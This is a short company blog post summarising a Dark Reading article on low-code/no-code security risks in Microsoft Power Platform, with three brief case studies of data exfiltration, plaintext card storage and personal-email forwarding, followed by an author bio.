SaaS Applications Streamline Application Development and Exploitation

  • Written by Michael Bargury
You are currently viewing SaaS Applications Streamline Application Development and Exploitation

Software-as-a-Service (SaaS) applications are built on the premise of streamlining business practices to improve productivity. Microsoft 365, Salesforce, and similar SaaS platforms commonly integrate automation tools that allow business users to develop the tools that they need to do their jobs.

The latest iteration of this is the integration of low-code/no-code platforms into these SaaS solutions. These platforms enable the average business user to develop applications with little or no visibility or oversight by IT and security personnel.

In his latest Dark Reading article, “3 Ways No-Code Developers Can Shoot Themselves in the Foot,” Zenity co-founder and CTO Michael Bargury describes some of the many ways in which this can go wrong. He shares three real-world examples of where the abuse of no-code platforms like Microsoft’s Power Platform created significant security concerns for business.

In the first example, Michael explores the story of a customer care team that took it upon itself to manage integrations and data sharing with a third-party vendor using its Microsoft Power Platform expertise. Fast forward a year, and the security team discovers the bulk exfiltration of sensitive customer data to an unknown, hard-coded IP address via insecure FTP.

The second case study describes a campaign by an HR team looking to streamline a campaign in which the company matched employee gifts to charitable foundations. While the use of Microsoft Power Platform reduced the workload on the HR team and resulted in a record-breaking campaign, the security team was not as lucky. The unwelcome discovery that credit card information was inappropriately collected and stored in plaintext in an environment accessible to employees, vendors, and contractors resulted in significant data cleanup and work to ensure continued compliance with PCI DSS.

A final, widespread issue is the use of personal email for business purposes, including copy-pasting email and calendar data from business to personal accounts. This approach avoids security controls on email forwarding and can be easily implemented with Power Platform templates.

Low-code and no-code platforms provide significant business benefits, but they must be used carefully and securely.  For the full story of each of these case studies and best practices for securely leveraging no-code in the business, check out the full article on Dark Reading.

About the Author

Michael Bargury

Michael is the Co-Founder and CTO of Zenity. He is an industry expert in cybersecurity interested in cloud, SaaS and AppSec. Prior to Zenity, Michael was a senior architect at Microsoft Cloud Security CTO Office, where he founded and headed security product efforts for IoT, APIs, IaC and confidential computing. Michael is leading the OWASP community effort on low-code/no-code security.

Table of contents